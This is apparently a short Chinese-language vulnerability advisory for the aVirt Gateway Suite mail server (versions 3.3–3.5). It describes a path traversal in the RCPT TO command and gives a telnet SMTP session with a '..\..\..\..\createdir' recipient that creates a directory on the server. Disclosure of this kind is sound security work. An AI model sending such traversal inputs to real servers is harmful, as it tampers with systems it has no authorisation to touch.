aVirt邮件服务器目录创建漏洞

　　受影响系统：

　　Avirt Gateway Suite 3.5

　　- Microsoft Windows 98

　　- Microsoft Windows 95

　　- Microsoft Windows NT 4.0

　　Avirt Gateway Suite 3.3a

　　- Microsoft Windows 98

　　- Microsoft Windows 95

　　- Microsoft Windows NT 4.0

　　Avirt Gateway Suite 3.3

　　- Microsoft Windows 98

　　- Microsoft Windows 95

　　- Microsoft Windows NT 4.0

　　描述：

　　aVirt邮件服务器在RPCT TO命令处理中包含一个漏洞。如果指定一个路径来代替email接收，攻击者可以在服务器本地系统中创建一个目录。

　　测试方法：

　　警 告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

　　telnet targethost:25

　　> 220 server aVirt Mail SMTP Server Ready.

　　MAIL FROM: user

　　> 250 user, Sender OK

　　rcpt to:..\..\..\..\createdir

　　> 250 ..\..\..\..\createdir, Recipient OK

　　data

　　> 354 Please enter mail, ending with a "." on a line by itself

　　blablabla

　　.

　　> 250 Mail accepted.

　　这件造成邮件服务器在根目录下创建了一个名为”createdir"的目录。实验表明这种方法并不能覆盖已经存在的文件夹。

　　建议：

　　暂无